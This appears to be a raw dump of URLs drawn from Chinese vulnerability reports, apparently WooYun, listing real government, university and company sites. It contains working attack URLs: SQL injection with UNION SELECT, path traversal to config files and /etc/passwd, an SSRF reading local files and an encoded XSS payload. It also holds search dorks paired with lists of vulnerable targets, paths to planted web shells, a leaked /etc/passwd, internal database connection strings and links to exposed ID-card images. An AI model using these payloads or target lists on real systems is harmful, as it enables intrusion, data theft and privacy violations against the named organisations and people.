http://www.airchinajet.com/download.php?url=2013/../../../config.php http://www.airchinajet.com/index.php/5167b1c10a?id=-1%20UNION%20SELECT%201,2,3,4,CONCAT_WS%28CHAR%2832,58,32%29,user%28%29,database%28%29,version%28%29%29,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39-- http://bangong.xcar.com.cn/ http://bangong.xcar.com.cn/Admin/index.php?s=/Public/main.html http://lsp.baidu.com/ http://lsp.baidu.com/cgi-bin/printenv http://159.226.97.60:8080/bns/front/Index/showAddPage.do http://159.226.97.60:8080/bns/resume/ResumeInfo/edit.do?id=80& http://www.hbjt.gov.cn http://www.hljjj.gov.cn http://www.scjt.gov.cn/ http://www.xmcp.gov.cn/ www.ycjtj.gov.cn http://ne.byd.com.cn/StorageModel/votermainDispatcher.action http://www.zxzjj.gov.cn/ http://www.npc.gov.cn/ http://admin.xiaomm.com.cn/AppManage/FeedbackInfoList.aspx?random=1423535935 http://admin.xiaomm.com.cn/Default.aspx# http://apk.gfan.com/Product/App1022436.html http://www.mumayi.com/android-910343.html http://www.wandoujia.com/apps/com.app.sister http://sgdaj.shaoguan.gov.cn/photo_admin.asp www.bitpress.com.cn/index.php?id=6 http://220.191.244.23/sft-jcflfw/public/login/preLogin.action www.minshengec.com/common/getListCookie.jhtml?callback=jQuery183038446558504106043_1423473509362&cookName=%5B%22memberUsername%22%2C%22JSESSIONID%22%2C%22mssc_sid%22%5D&_=1423473510555 http://dns1.enorth.com.cn/admin http://dns1.enorth.com.cn/uploads/titlepic/R9Pl5KpaHtgaOoix.php http://211.99.203.85/book.action www.moyoyo.com http://v.moyoyo.com/web/list?cid=6 http://v.moyoyo.com/web/list?cid=6 http://www.elife.com/ http://cms.51yund.com/sport/index.php http://www.timber2005.com/ http://ischoolgu.xmu.edu.cn:8002/jyzdzx/admin/admin_xzzx_add.asp http://ischoolgu.xmu.edu.cn:8002/jyzdzx/countinfo.asp http://ischoolgu.xmu.edu.cn:8002/jyzdzx/countipdisplay.asp http://ischoolgu.xmu.edu.cn:8002/jyzdzx/admin/ www.super8.com.cn http://www.super8.com.cn http://1.com\u0022\u003e\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u002f\u006f\u006e\u006c\u006f\u0061\u0064\u003d\u0061\u006c\u0065\u0072\u0074\u0028\u0031\u0029\u003e/1.swf[/flash http://www.elife.com/forum.php?mod=viewthread&tid=221463&pid=1655935&page=7&extra=#pid1655935 http://www.flyme.cn/firmwarelist.jsp?modelId=8&type=1 http://uxss.sinaapp.com/ site:spider2.enorth.com.cn http://spider2.enorth.com.cn:8000/order/admin_user_order/user_sel_tag_or_url/user_sel_tag_or_url_action.do?action=web_url_list&ousvo.page_no=292 http://spider2.enorth.com.cn:8000/order/admin_user_order/list_snatch_urls/list_snatch_urls.do?action=list&pusvo.is_init=true&initpusvo.url_id=13368 http://h3community.h3c.com:80/Member/RegistrationPage.aspx http://www.sdwhys.com/SM2005/student/StuCJ/StuResult.asp?QueryFs=4&txtStu=aaaabn%27&ShowFS=1&StartKSID=3&EndKSID=15&checkbox1=0 http://www.zjnksyzx.com:8801/SM2005/student/StuCJ/StuResult.asp?QueryFs=4&txtStu=aaaabn%27&ShowFS=1&StartKSID=3&EndKSID=15&checkbox1=0 http://www.lcxyz.com:21245/SM2005/student/StuCJ/StuResult.asp?QueryFs=4&txtStu=aaaabn%27&ShowFS=1&StartKSID=3&EndKSID=15&checkbox1=0 http://www.suyaxing.com:81/SM2005/student/StuCJ/StuResult.asp?QueryFs=4&txtStu=aaaabn%27&ShowFS=1&StartKSID=3&EndKSID=15&checkbox1=0 http://www.hwsyxx.com/SM2005/student/StuCJ/StuResult.asp?QueryFs=4&txtStu=aaaabn%27&ShowFS=1&StartKSID=3&EndKSID=15&checkbox1=0 http://www.dlwsxx.com/SM2005/student/StuCJ/StuResult.asp?QueryFs=4&txtStu=aaaabn%27&ShowFS=1&StartKSID=3&EndKSID=15&checkbox1=0 http://58.56.38.170/SM2005/student/StuCJ/StuResult.asp?QueryFs=4&txtStu=aaaabn%27&ShowFS=1&StartKSID=3&EndKSID=15&checkbox1=0 http://58.56.38.170/SM2005/student/StuCJ/StuResult.asp?QueryFs=4&txtStu=aaaabn%27&ShowFS=1&StartKSID=3&EndKSID=15&checkbox1 http://221.208.242.211:9119/karaoke-province-admin/login http://www.tophr.net/InterView/news.asp?id=231 http://www.dajie.com/profile/28225574?f_fid=146981430&f_type=91&f_actorId=28225574&f_category=hotnewsfeed&f_view=0 http://www.dajie.com/group/1054/topic/1891845?f_fid=146970430&f_type=92&f_actorId=28225574&f_category=userminifeed&f_view=0 http://zjlx.zjol.com.cn/manage/index.jsp url:http://www2.cmu.edu.tw/~alumni/admin/index.php http://**.**.**/login.jsp http://www.ln86e.com/),是网龙公司华渔教育的产品。 http://contests.travel.aol.com/pages/aoltravelcontest/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc/passwd%2500.jpg http://contests.travel.aol.com/pages/aoltravelcontest/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Froot%252F.bash_history%2500.jpg http://58.83.193.121/sxymjdmp/order/orderFlowQueryForOutsideByCwb http://txd.explink.cn/txddmp/login http://58.83.193.121/bjzzyt/order/wumaorderFlowQueryForOutsideByCwb?cwbs=14050467367941&sign=750fe041f4d84a00ec90cb6776f2ee1a http://58.83.193.121/bjzzyt/order/wumaorderFlowQueryForOutsideByCwb?cwbs=14061987681145&sign=9d20df7d173f62f7423608724df9a2b0 http://58.83.193.121/bjzzyt/order/wumaorderFlowQueryForOutsideByCwb?cwbs=14051896845242&sign=210ab730ba3f4bc18e761a08bd9104c6 http://58.83.193.121/ams/login http://souky.eol.cn/fenshu_search_34.php?=88952634&schoolid=5&xueke=01&xuewei_class=1 http://haogaozhong.eol.cn/school_area.php?province=11 http://help.ads.renren.com/help-3-1.html http://wooyun.org/bugs/wooyun-2010-094793 http://dcrm.byd.com.cn http://jnbt.haier.net/login.ered?reqCode=logout http://edu.gooann.com/ http://homesecurity.haier.com/HaierAF/login4webapp/login.action http://store.iqiyi.com/ http://car.51yund.com/mobile/get_all_nopay_order.php http://car.51yund.com/mobile/get_all_pay_order.php http://car.51yund.com/mobile/order_info.php?order_id=2755 http://www.rpsg.sgcc.com.cn/2014admin/ http://www.rpsg.sgcc.com.cn/2014admin/others.asp?mudi=download_EN_CN&n=index.asp&ENname=../config.asp http://care2012.acftu.org/data/print/info_list.jsp?family_type=1&record_id=33888891 http://care2012.acftu.org/data/print/info_list.jsp?family_type=1&record_id=33888890 http://univ1.zte.com.cn/XsExam/Application/Certification/UICertificationQuery.aspx http://www.fjqz-l-tax.gov.cn/TaxWeb/FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector shell-url:http://www.fjqz-l-tax.gov.cn/TaxWeb/UserFiles/Image/job.jsp http://chk.ehuatai.com/wap/login/loginAction-userLogin.action http://chk.ehuatai.com/wap/login/loginAction-userLogin.action jar:/home/htusr/apache-tomcat-5.5.25/bin/commons-logging-api.jar http://218.30.22.96/reg_app/dx_ajax.php?key= root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin abrt:x:173:173::/etc/abrt:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous User:/var/lib/nfs:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin saslauth:x:499:76:"Saslauthd saslauth:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin tcpdump:x:72:72::/:/sbin/nologin oprofile:x:16:16:Special OProfile:/home/oprofile:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin mysql:x:500:500::/home/mysql:/sbin/nologin www:x:501:501::/home/www:/sbin/nologin nagios:x:502:502::/home/nagios:/bin/bash cacti:x:503:504::/home/cacti:/bin/bash nginx:x:504:505::/home/nginx:/sbin/nologin http://ffp.scal.com.cn:80/ http://www.hp1997.com/MyCenter/MyOrderInfo.aspx?orderid=11812 http://www.hp1997.com/MyCenter/MyOrderInfo.aspx?orderid=11879 http://www.hp1997.com/MyCenter/MyOrderInfo.aspx?orderid=11880 http://www.hp1997.com/MyCenter/MyOrderInfo.aspx?orderid=11881 http://www.hp1997.com/MyCenter/MyOrderInfo.aspx?orderid=11901 android:allowBackup="true"(结点设置可被外部调用导致敏感信息泄露) http://www.hp1997.com/MyCenter/MyOrderInfo.aspx?orderid=11905&ordernumber=788750871801 http://www.hp1997.com/MyCenter/MyOrderInfo.aspx?orderid=11906&ordernumber=093750871811 http://iwangzu.chexiang.com/rent.php?car_status=1 http://sqlmap.org http://mxd.games.sdo.com/ http://124.127.48.20:8080/fw/mindex.do?tab=home http://124.127.48.19/web/Login.aspx http://124.127.48.21:8080/event/index3.do http://g189.cn/yxds/team_detail.php?team_id=240 http://218.87.71.12 http://english.sinopec.com/web.tar.gz http://cpro.baidustatic.com/cpro/ui/c.js http://**.**.**/_ http://**.**.**/form.jsp http://218.201.32.57/file/upload/2015-02-12/jspma1.jsp http://www.rzrsrc.com/rz12333/e/tool/szyf/?act=bysdacx1 http://10.10.116.11 http://t.cn/RwbLKDx http://share.renren.com/share/buttonshare.do?link=http://t.cn/RwbLKDx http://rwjd.zjgsu.edu.cn/content/detail.php?sid=23&cid=514&id=1006 http://www.zjvcc.edu.cn/content/detail.php?sid=2&cid=578&id=5189 http://zjrwxy.com/content/detail.php?sid=12&cid=577&id=1059 http://zgysx.hznu.edu.cn/content/detail.php?sid=39&cid=703&id=2178 http://hbpj.zfc.edu.cn//content/detail.php?id=1405&sid=3&cid=655&tid=667 http://www.nlgjn.com/content/detail.php?sid=12&cid=576&id=1104 soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance xmlns:xsd="http://www.w3.org/2001/XMLSchema xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/ soap:Body http://sys.zs91.com soap:Body http://optimization.aol.com/tools/roboto/?url=file:///etc/passwd http://down.qibosoft.com/down.php?v=v7 http://121.10.6.139/khsafe/jsp/login!doLogin.action ftp://124.193.207.130/ http://www.viewgood.com/ http://demo.viewgood.com先注册个账号 http://www.ztemall.com http://www.ztemall.com/pay.html?xsbh=XX20150212006 http://www.fj51e.cn/),看网站脚注,是网龙的 https://search.szfw.org http://www.szfw.org/ https://search.szfw.org/entry.php?action=getUserinfo2&userId=1 https://search.szfw.org/entry.php?action=getUserinfo2&userId=1%20UNION%20select%201,2,3,4,5,6,7,8,9,10,11# http://222.215.68.133:9090/tm/toLogin.action http://yfg.mszq.com/console http://www.4007787878.com/Order/OrderDetail?orderCodeOnline=30319 http://dayi.wendu.com http://www.wendu.com//app/xq17.txt http://eduyun.nwnu.edu.cn/websites/ http://eduyun.nwnu.edu.cn/websites/index.php?g=CommonTempt&m=Article&a=index&t=CommonTempt1&webid=1000043&id=1000077&channelid=1000079&articleid=1001078 http://eduyun.nwnu.edu.cn/websites/index.php?g=Admin&m=Index&a=index# www.kx315.net http://220.250.64.17:8080/ http://www.shangh.12306.cn/Dzsw/Shky/hwky.nei/dbwd.action http://www.shangh.12306.cn/Dzsw/Shky/hwky.nei/bak.jsp https://125.70.228.81 http://blog.99.com http://www.eduwind.com/ http://demo.eduwind.com/course/index?categoryId=8'加个'直接报错,存在注入 http://www.keyisou.com//course/index?categoryId=8 http://shanbay.com/ http://passport.mop.com/ http://jwc.whut.edu.cn/Home/Login.aspx http://ee.dgut.edu.cn/do/s_rpc.php存在注入 http://www.womai.com/Member/AddAddress.do https://222.177.8.139 http://192.168.0.13/npowork/wssb/index/index.jsp http://192.168.0.27:8088/web/UserAction.do?method=getLoginInfo http://192.168.0.22/web/index.jsp http://192.168.0.25/ http://192.168.0.25/test.txt http://219.142.81.117:8080/tjcgs/ jdbc:oracle:thin:@10.90.14.168:1521:cgsmps jdbc:oracle:thin:@10.90.1.101:1521:cgsmpdb jdbc:oracle:thin:@localhost:1521:ora11 jdbc:oracle:thin:@127.0.0.1:1521:ORA721 jdbc:oracle:thin:@10.90.12.192:1521:orcl jdbc:oracle:thin:@localhost:1521:ORA721 http://appms.xichebang.com.cn:8000/admin/ http://group.zcool.com.cn/ http://116.239.2.6/ HTTP://**.**.** http://www.gps1388.com/weblogin.aspx http://www.njjtgf.cn/WorkGuide01.aspx?classcode=/BSZN/ZSBZ/ http://gongcheng.haier.net:8011/security/loginInit.action http://202.108.116.132:8080/order3b/servlet/logout http://www.hdswsj.gov.cn/ http://www.hdswsj.gov.cn/votes/votes_show.action?vi=4 http://202.102.101.42/login.do?loginForm.loginname=eqiyun&loginForm.password=- http://hk5.midea.com/c/products.php?id=1 http://hk5.midea.com/c/products_cat.php?cat=1&id=16 http://hk5.midea.com/c/products_cat.php?cat=21&id=1 http://hk5.midea.com/c/products_details.php?cat=26&id=16&line=1&pid=108 http://hk5.midea.com/c/products_details.php?cat=26&id=16&line=67&pid=1 http://hk5.midea.com/c/products_line.php?cat=23&id=16&line=65 http://hk5.midea.com/c/products_line.php?cat=23&id=1&line=65 http://hk5.midea.com/c/products_line.php?cat=23&id=16&line=1 http://hk5.midea.com/c/project.php?id=1 http://www.jdyyeb.com/xt_zhuanjia_view.php?pid=62&class1=48&id=374 inurl:productshow.asp?id= http://www.fhsjdz.com/productshow.asp?id=5 http://www.dodo-beauty.com/productshow.asp?id=801 http://www.vivid-ledlighting.com/productshow.asp?id=410 http://www.szv-sys.com/productshow.asp?id=425 http://www.topwellce.com/productshow.asp?id=448 http://119.254.81.171:8080 http://wooyun.org/bugs/wooyun-2015-093899 http://www.sharkpark.cn/manager/home#alliance_applies/edit/54cb041e6f5ca5fb028b4656?0.2013901132158935 http://www.wulmq.12306.cn:7001/Dzsw/Shky/hwky.nei/productdesfwzn.action http://www.ln86e.com/ajax/submit_tj.ashx?lessionID=226&lessonptype=283&lessonpmode=True www.bzdc.cn http://www.bzhb.gov.cn/Body.asp?ID=14424 http://www.bzagri.gov.cn/Body.asp?ID=7797 http://www.bzkp.gov.cn/Body.asp?ID=1084 http://www.tjxwsj.cn/Body.asp?ID=3680 http://www.pcjyty.gov.cn/Body.asp?ID=4523 http://www.bzqjxj.gov.cn/Body.asp?ID=57 http://tjzyjy.cn/Body.asp?ID=181 http://www.bzaj.gov.cn/Body.asp?ID=9117 http://www.bzsglj.cn/Body.asp?ID=579 http://www.scpcgt.gov.cn/Body.asp?ID=7233 http://www.tjxyjj.cn/Body.asp?ID=491 http://www.bzkjpx.com/Body.asp?ID=143 http://bzqtzb.com/Body.asp?ID=256 http://www.bzsngw.gov.cn/Body.asp?ID=776 http://www.bzrkjsw.gov.cn/Body.asp?ID=495 http://www.bzsglj.cn/Body.asp?ID=579的: http://tjzyjy.cn/Body.asp?ID=181的: http://www.bzhb.gov.cn/Body.asp?ID=14424的: http://img02.res.yoho.cn/headimg/2015/02/14/17/02ff707bc3e25b533bf2e4ad4ab135d0fa.html http://i.veryeast.cn/user/login?redirect=http%3A%2F%2Fmy.veryeast.cn%2Fuser%2Fsetting%23logout http://tch.wlxx160.com http://www.txtdcb.gov.cn:88/ http://www.txtdcb.gov.cn:88/add.aspx http://www.txtdcb.gov.cn:88/imag/hongxian/2015_02_14_11_31_38泰兴市挂[2014]43号1.aspx http://www.zteup.com/view/toindex Host:app.zteup.com:8070 http://app.zteup.com:8070/是没办法访问的,那就在找找图片在哪,再去拦截一下请求身份证图片的HTTP消息: http://img3.zteup.com,那么身份证的地址是在: http://img3.zteup.com/upload/20150211110753964528486.jpg http://img3.zteup.com/upload/20150204170007915167538.jpg https://account.oppo.com/index.php?q=user/login&back=http%3A%2F%2Fwww.oppo.com%2F http://119.254.111.208/users/login http://118.145.26.136/ http://118.145.26.136/dede/login.php?gotopage=%2Fdede%2F http://125.88.10.244/iCloud/login.html http://125.88.10.244/iCloud/inbox.html https://github.com/sensepost/reGeorg http://itchenyi.blog.51cto.com/4745638/1137143 http://www.codesky.net/article/201207/171461.html http://localhost/3gcms/index.php?s=guestbook http://wooyun.org/bugs/wooyun-2010-069115 inurl:article.php?action=list&typeid= http://www.cjpmp.com/cms/article.php?action=list&typeid=99 http://www.hnmz.gov.cn/new/cms/article.php?action=list&typeid=17 http://www.jpcm888.com/cms/article.php?action=list&typeid=12 http://www.zhsdz.com/cms/article.php?action=list&typeid=2 http://www.yfzyxx.com/cms/article.php?action=list&typeid=11 http://www.ahdlgcxx.cn/cms/article.php?action=list&typeid=24 http://www.cjpmp.com/cms/article.php?action=list&typeid=99 http://www.hnmz.gov.cn/new/cms/article.php?action=list&typeid=17 http://www.jpcm888.com/cms/article.php?action=list&typeid=12 http://www.zhsdz.com/cms/article.php?action=list&typeid=2 http://www.yfzyxx.com/cms/article.php?action=list&typeid=11 http://www.ahdlgcxx.cn/cms/article.php?action=list&typeid=24 http://baike.baidu.com/uc/draftlist http://218.94.1.85 http://157.122.153.67:9000/khyx/ http://rb.tcl.com/ http://rb.tcl.com:80/ inurl:bulletinPageList.jsp?groupId= inurl:bulletinBrowse.jsp?Id= inurl:bulletinList.jsp http://yx.cau.edu.cn/bulletinPageList.jsp?groupId=1 http://yx.cau.edu.cn/bulletinList.jsp?groupId=1 http://yingxin.ncepu.edu.cn/bulletinPageList.jsp?groupId=1 http://yx.tjcu.edu.cn/bulletinPageList.jsp?groupId=1 http://www.shiyuesoft.com/cases/case.html http://**.**.**/syfile/ckeditor.jsp_ http://**.**.**/syfile/ckeditor.jsp_ http://**.**.**/syfile/ckeditor.jsp_ http://**.**.**/syfile/ckeditor.jsp_ http://**.**.**/syfile/ckeditor.jsp_ http://**.**.**/syfile/ckeditor.jsp_ http://**.**.**/syfile/ckeditor.jsp_ http://**.**.**/syfile/ckeditor.jsp_ http://**.**.**/syfile/ckeditor.jsp_ http://**.**.**/syfile/ckeditor.jsp http://www.didapinche.com:9022/app/plaza/?city_id=1&type=passenger&user_cid=90400219-5537-4be2-b2aa-d33364b38723 http://sso.maxthon.cn/quit.php这个页面被删除。 https://125.64.219.230/ http://gzlishun.yupu.cn/Default.asp http://www.mprlzybz.gov.cn/newsmore1.asp?lei=3&sjg=11 http://asc.h3c.com/ http://web.sh.ptt.189.cn/company/login.do inurl:img_info.asp?num= http://www.hzkfqedu.com/img_info.asp?num=187 http://www.hzxhgb.com/img_info.asp?num=11 http://fl.hanzhong.gov.cn/img_info.asp?num=703 http://www.yxgtj.net/img_info.asp?num=187 http://www.hzdzdd.cn/img_info.asp?num=323 http://www.ssxgxs.com/admin/admin_login.asp http://zjykcoop.cn/admin/Admin_Login.asp http://gxs.qz.gov.cn/admin/Admin_Login.asp http://www.zjxccoop.com/admin/Admin_Login.asp http://www.tscoop.cn/admin/Admin_Login.asp http://www.yongjiacoop.com/admin/Admin_Login.asp http://www.racoop.com/admin/Admin_Login.asp http://osp.sdo.com:8080/Exterior/Login.aspx http://www.gzbg100.cn/preferentialPage/ly_iyouhui.aspx?cityid=0451 http://123.167.5.158:9801/docs/funcspecs/2.jsp?sort=1&editfile=c%3A%2Fboot.ini http://note.99.com和http://gm.99.com//存在 http://t.hb.189.cn/备份.rar这里得到后台。 inurl:jieshao.asp?num= http://www.xxgtj.com/jieshao.asp?num=72 http://www.yxgtj.net/jieshao.asp?num=72 http://gtj.nanzheng.gov.cn/jieshao.asp?num=72 http://gtj.hzedz.gov.cn/jieshao.asp?num=63 http://www.dhtyhotel.com/jieshao.asp?num=62 http://www.hdshgs.com/jieshao.asp?num=64 http://www.hzljjz.com/jieshao.asp?num=68 http://manage.zhidao.189.cn/Index.aspx http://js.189.cn/emall/hdscOP/jsp/openter.jsp http://jwc.zust.edu.cn/)最下面有网站管理的入口,点进去输入用户名admin,猜对密码就能登录啦。 http://www.yundaex.com/de/admin/idcard/idCard.php此处上传上传身份证可以直接截断为php文件 inurl:jzzc_list.asp?smallclassname= http://www.jshuaqiao.com/jzzc_list.asp?smallclassname= http://www.wyxzfw.com/jzzc_list.asp?smallclassname= http://www.hyxzfw.gov.cn/jzzc_list.asp?smallclassname= http://60.8.102.174/jzzc_list.asp?smallclassname= http://www.gzshebao.org/jzzc_list.asp?smallclassname= http://gaokao.ahedu.gov.cn/admin4/show.asp?id=18453 http://mail.haiertvbic.com/ http://mail.haiertvbic.com/biddetail.php?id=9 http://121.207.247.161:8080/ http://121.207.247.161:8080//php/setup.php http://xzfw.maoming.gov.cn/html/nbszn.html?cT=838 http://wsbs.dpxq.gov.cn/ http://wsbs.dpxq.gov.cn/bsdt_detail.jsp?ztmsIndex=1 http://wsbs.dpxq.gov.cn/street/guanxiafanwei.jsp?bguid=1&name= http://wsbs.dpxq.gov.cn/street/zjfw_detail.jsp?bguid=1&ztmsIndex=89 http://wsbs.dpxq.gov.cn/street/zjfw_detail.jsp?bguid=1 http://jiuye.swjtu.edu.cn/jdjy/NewsShow/NoticeShow.aspx?id=1496 http://map.yundasys.com:11080/action/gis/branch/loadBranch?orgCode=100410&action=edit http://map.yundasys.com:11080/action/gis/branch/loadBranch?orgCode=200410&action=edit inurl:searchresult.jsp?ItemName= http://117.40.186.185:8008/outportal/channel/searchresult.jsp?ItemName= http://www.xsxzfwzx.gov.cn/channel/searchresult.jsp?ItemName= http://www.gzwssp.gov.cn/channel/searchresult.jsp?ItemName= http://111.75.245.163/channel/searchresult.jsp?ItemName= http://xzfw.ncqsh.gov.cn/channel/searchresult.jsp?ItemName= http://www.qhdzw.gov.cn/channel/searchresult.jsp?ItemName= http://wssp.shicheng.gov.cn/channel/searchresult.jsp?ItemName= http://www.cyxspw.com/channel/searchresult.jsp?ItemName= www.zjzs.net https://219.153.5.247/ https://219.153.5.247/AccountAction.action https://219.153.5.247/AccountAction.action http://tuan.gzbg100.cn/sysadmin/Login.aspx http://**.**.**/khyy/login.asp http://1.202.236.211/FrameWork/Login.aspx http://1.202.236.211/FlightReserve/Insurance/InsuranceList.aspx http://1.202.236.215/Framework/Frame.aspx http://1.202.236.211/Framework/Frame.aspx http://219.147.168.104/Kjpt/platform/login.htm http://219.147.168.104/Kjpt/Register/sysApp_uploadUserUnitfjFile.action http://itsm.yundasys.com:45177/itsm-webapp/pages/login.jsp http://ams.yundasys.com:11366/hkgl/index.jsp http://www.zzmetro.com/feedback.aspx http://218.87.140.106/ http://oa.jxgxedu.gov.cn/ http://59.55.33.137:8010/ http://59.55.33.137:8040/ http://www.gznoa.com/ http://ckxx.hebeea.edu.cn:8080/ http://223.203.209.143/cacti/cacti.sql http://223.203.209.143/cacti/graph_view.php?action=tree&tree_id=2&leaf_id=8 http://www.chinabp.com.cn/articleWeb_findArticleByArticleId.action http://www.ddb.xm.gov.cn/ftb.imagegallery.aspx http://116.255.240.54/Login.aspx inurl:/VOD2005 http://vod.ahlib.com/vod2005/VodCenter/OpenStationFile.asp?ID= http://118.112.184.145:88/vod2005/VodCenter/OpenStationFile.asp?ID= http://vod.whedu.net/vod2005/VodCenter/OpenStationFile.asp?ID= http://www.sdwhys.com/vod2005/VodCenter/OpenStationFile.asp?ID= http://www.zjk2z.cn/vod2005/VodCenter/OpenStationFile.asp?ID= http://xinzhongedu.vicp.net/vod2005/VodCenter/OpenStationFile.asp?ID= http://v.gzqjy.cn/vod2005/VodCenter/OpenStationFile.asp?ID= http://vod.ahlib.com/vod2005/VodCenter/OpenStationFile.asp?ID= http://vod.ahlib.com/vod2005/VodCenter/DoDownLoad.asp?ID= http://118.112.184.145:88/vod2005/VodCenter/DoDownLoad.asp?ID= http://vod.whedu.net/vod2005/VodCenter/DoDownLoad.asp?ID= http://www.sdwhys.com/vod2005/VodCenter/DoDownLoad.asp?ID= http://www.zjk2z.cn/vod2005/VodCenter/DoDownLoad.asp?ID= http://xinzhongedu.vicp.net/vod2005/VodCenter/DoDownLoad.asp?ID= http://v.gzqjy.cn/vod2005/VodCenter/DoDownLoad.asp?ID= http://vod.ahlib.com/vod2005/VodCenter/Player/ClosePlayRes.asp?UserName= http://118.112.184.145:88/vod2005/VodCenter/Player/ClosePlayRes.asp?UserName= http://vod.whedu.net/vod2005/VodCenter/Player/ClosePlayRes.asp?UserName= http://www.sdwhys.com/vod2005/VodCenter/Player/ClosePlayRes.asp?UserName= http://www.zjk2z.cn/vod2005/VodCenter/Player/ClosePlayRes.asp?UserName= http://xinzhongedu.vicp.net/vod2005/VodCenter/Player/ClosePlayRes.asp?UserName= http://v.gzqjy.cn/vod2005/VodCenter/Player/ClosePlayRes.asp?UserName= http://vod.ahlib.com/vod2005/public/asp/Microcode/data.asp?CodeName= http://118.112.184.145:88/vod2005/public/asp/Microcode/data.asp?CodeName= http://vod.whedu.net/vod2005/public/asp/Microcode/data.asp?CodeName= http://www.sdwhys.com/vod2005/public/asp/Microcode/data.asp?CodeName= http://www.zjk2z.cn/vod2005/public/asp/Microcode/data.asp?CodeName= http://xinzhongedu.vicp.net/vod2005/public/asp/Microcode/data.asp?CodeName= http://v.gzqjy.cn/vod2005/public/asp/Microcode/data.asp?CodeName= https://183.230.36.210/index.php http://huaban.com/pins/326847433/comments/ URL:http://huaban.com/pins/326847433/comments/ Method:POST Referer:http://huaban.com/pins/326847433/ text:test http://huaban.com/pins/326847433/comments/ http://xjz.zjol.com.cn/v2/reporteruser.aspx?id=3337670 http://218.87.140.106/ http://oa.jxgxedu.gov.cn/ http://59.55.33.137:8010/ http://59.55.33.137:8040/ http://www.gznoa.com/ http://wooyun.org/bugs/wooyun-2015-096707,是因为没有对KEY进行过滤,造成了注入,修复后的代码是这样对KEY进行过滤的。 http://rctdlz.cn/DocumentPrint/ContractApplyTransfer.aspx?id= http://221.1.104.11:8011/DocumentPrint/ContractApplyTransfer.aspx?id= http://221.2.171.59:8300/DocumentPrint/ContractApplyTransfer.aspx?id= http://demo.inongyou.cn/DocumentPrint/ContractApplyTransfer.aspx?id= http://60.2.214.118:8088/DocumentPrint/ContractApplyTransfer.aspx?id= http://121.17.2.52/DocumentPrint/ContractApplyTransfer.aspx?id= http://61.186.154.210:8088/DocumentPrint/ContractApplyTransfer.aspx?id= http://so.269.net/more.php?typeid=1 http://www.sdqx.gov.cn/ http://220.191.211.55/risen/public/forcePwd.action http://ah2.zhangyue.com/zybook/u/p/user.php?key=1U1&usr=iXXXX7591&rgt=7&p1=150213162338630022&pc=10&p2=108695&p3=770003&p4=501603&p5=19&p6=&p7=JJAAAFFFJJGIEH&p9=2&p12=&p16=Coolpad+V1-C&p21=3&p22=4.4.4&zysid=d295ceb19323e12b7bb4c8b0760620c0&zysign=R0mUI23JFammzJpCL3noDVYCh6eetuq2VVm%2BMJODSDzNu1O9hrdC70saZ9%2FD%2BBnuI4R2ALb32BRucuRx0YcgKQ%3D%3D http://211.143.125.238/org/login.do http://121.14.117.254:8080/ http://121.14.117.254:8080/resin-doc/viewfile/?contextpath=/&servletpath=&file=index.jsp http://202.85.212.123/rms_R/login!login.do http://exam.zhongsou.com/index.php/studay/pxzlc/27 http://lt.zhongsou.com/aulogin/login http://d3m.zhongsou.com/Login http://e.zhongsou.com/user site:zhongsou.com http://musicc.zae.zhongsou.com/admin/lists?version=3&md5=3c76d020e9d3d5763971a3992c55ea62&page=2&return_url=http%3A%2F%2Fmusic http://wooyun.org/bugs/wooyun-2010-079089 http://61.156.3.61/xiangqing.jsp?sm_no=135215 http://61.156.3.61/xiangqing.jsp?sm_no=127744 http://sqlmap.org http://xzfw.gaoyou.gov.cn/outweb/outweb/appCase/listServiceItems.action http://rctdlz.cn/DocumentPrint/ContractApplyFamily.aspx?id= http://221.1.104.11:8011/DocumentPrint/ContractApplyFamily.aspx?id= http://221.2.171.59:8300/DocumentPrint/ContractApplyFamily.aspx?id= http://demo.inongyou.cn/DocumentPrint/ContractApplyFamily.aspx?id= http://60.2.214.118:8088/DocumentPrint/ContractApplyFamily.aspx?id= http://121.17.2.52/DocumentPrint/ContractApplyFamily.aspx?id= http://61.186.154.210:8088/DocumentPrint/ContractApplyFamily.aspx?id= wooyun.org/bugs/wooyun-2010-097083_ http://wxhd.shwxcs.cn/PhotoflyingCity/AppActivityNfc/index.action?urlcategory=1&appid=AP310000000000010634&areacode=310000&portaltype=0&columnid=&accesstype=1&ext=&version=3&usessionid=&ua=&resourceid=SV310000000333&backurl= http://www.xxx.com/shell.txt http://rctdlz.cn/DocumentPrint/LandDisputes.aspx?id= http://221.1.104.11:8011/DocumentPrint/LandDisputes.aspx?id= http://221.2.171.59:8300/DocumentPrint/LandDisputes.aspx?id= http://demo.inongyou.cn/DocumentPrint/LandDisputes.aspx?id= http://60.2.214.118:8088/DocumentPrint/LandDisputes.aspx?id= 